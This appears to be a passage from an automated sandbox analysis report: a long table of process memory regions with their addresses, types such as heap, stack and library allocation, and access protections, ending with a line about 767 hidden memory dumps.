page read and write
|
||
|
1B898C89000
|
heap
|
page read and write
|
||
|
2560183B000
|
trusted library allocation
|
page read and write
|
||
|
253BAE8F000
|
heap
|
page read and write
|
||
|
7FF848C86000
|
trusted library allocation
|
page read and write
|
||
|
17CFEC0B000
|
heap
|
page read and write
|
||
|
253B84AF000
|
heap
|
page read and write
|
||
|
1B89AC6C000
|
heap
|
page read and write
|
||
|
253BA272000
|
heap
|
page read and write
|
||
|
1B89AC88000
|
heap
|
page read and write
|
||
|
17CFCB90000
|
heap
|
page read and write
|
||
|
2489B66E000
|
trusted library allocation
|
page read and write
|
||
|
17CFEBB3000
|
heap
|
page read and write
|
||
|
2567EFF0000
|
heap
|
page execute and read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253BA636000
|
heap
|
page read and write
|
||
|
4E3E000
|
stack
|
page read and write
|
||
|
253BA27E000
|
heap
|
page read and write
|
||
|
253B8380000
|
heap
|
page read and write
|
||
|
17CFEED0000
|
heap
|
page read and write
|
||
|
F6C000
|
heap
|
page read and write
|
||
|
AEEBCFE000
|
stack
|
page read and write
|
||
|
AEEC3BE000
|
stack
|
page read and write
|
||
|
5AA44FE000
|
stack
|
page read and write
|
||
|
20FC903C000
|
heap
|
page read and write
|
||
|
253BA250000
|
heap
|
page read and write
|
||
|
2567F325000
|
heap
|
page read and write
|
||
|
256019C4000
|
trusted library allocation
|
page read and write
|
||
|
253BACE5000
|
heap
|
page read and write
|
||
|
17CFE714000
|
heap
|
page read and write
|
||
|
253BA26A000
|
heap
|
page read and write
|
||
|
253BAEC2000
|
heap
|
page read and write
|
||
|
2BB9000
|
trusted library allocation
|
page read and write
|
||
|
248AB251000
|
trusted library allocation
|
page read and write
|
||
|
AEEC138000
|
stack
|
page read and write
|
||
|
20FC9034000
|
heap
|
page read and write
|
||
|
1216000
|
trusted library allocation
|
page execute and read and write
|
||
|
2489B210000
|
heap
|
page read and write
|
||
|
17CFEBAF000
|
heap
|
page read and write
|
||
|
AEEB9D3000
|
stack
|
page read and write
|
||
|
2489D8EB000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
|
253BA558000
|
heap
|
page read and write
|
||
|
20FC708F000
|
heap
|
page read and write
|
||
|
2567F230000
|
heap
|
page execute and read and write
|
||
|
5866000
|
trusted library allocation
|
page read and write
|
||
|
1B898C89000
|
heap
|
page read and write
|
||
|
20FC9331000
|
heap
|
page read and write
|
||
|
253BAE7E000
|
heap
|
page read and write
|
||
|
2567F340000
|
heap
|
page read and write
|
||
|
7FF848DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
122B000
|
trusted library allocation
|
page execute and read and write
|
||
|
253BA252000
|
heap
|
page read and write
|
||
|
2560142F000
|
trusted library allocation
|
page read and write
|
||
|
3DA3000
|
trusted library allocation
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
1B89AC64000
|
heap
|
page read and write
|
||
|
20FC7068000
|
heap
|
page read and write
|
||
|
17CFEC17000
|
heap
|
page read and write
|
||
|
253BA5BE000
|
heap
|
page read and write
|
||
|
5D4D000
|
stack
|
page read and write
|
||
|
2567F330000
|
heap
|
page read and write
|
||
|
2489AA70000
|
heap
|
page readonly
|
||
|
1B89AC9B000
|
heap
|
page read and write
|
||
|
5AA4AFF000
|
stack
|
page read and write
|
||
|
253BA500000
|
heap
|
page read and write
|
||
|
1B89AC67000
|
heap
|
page read and write
|
||
|
253BA59D000
|
heap
|
page read and write
|
||
|
253BAEA1000
|
heap
|
page read and write
|
||
|
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
|
253BA5FD000
|
heap
|
page read and write
|
||
|
20FC70B4000
|
heap
|
page read and write
|
||
|
1B89AF60000
|
heap
|
page read and write
|
||
|
F0F000
|
heap
|
page read and write
|
||
|
1B898BC0000
|
heap
|
page read and write
|
||
|
AFC952A000
|
stack
|
page read and write
|
||
|
1B898C9C000
|
heap
|
page read and write
|
||
|
20FC7060000
|
heap
|
page read and write
|
||
|
253BA59D000
|
heap
|
page read and write
|
||
|
20FC9098000
|
heap
|
page read and write
|
||
|
253B8502000
|
heap
|
page read and write
|
||
|
D00000
|
heap
|
page read and write
|
||
|
253BA6C0000
|
heap
|
page read and write
|
||
|
20FC9098000
|
heap
|
page read and write
|
||
|
20FC7350000
|
heap
|
page read and write
|
||
|
2560185D000
|
trusted library allocation
|
page read and write
|
||
|
20FC9032000
|
heap
|
page read and write
|
||
|
17CFCC2A000
|
heap
|
page read and write
|
||
|
AFC9DFE000
|
stack
|
page read and write
|
||
|
2489919A000
|
heap
|
page read and write
|
||
|
7FF848C8C000
|
trusted library allocation
|
page execute and read and write
|
||
|
20FC906B000
|
heap
|
page read and write
|
||
|
2567E691000
|
heap
|
page read and write
|
||
|
17CFEC31000
|
heap
|
page read and write
|
||
|
253BA25E000
|
heap
|
page read and write
|
||
|
253BA261000
|
heap
|
page read and write
|
There are 767 hidden memdumps, click here to show them.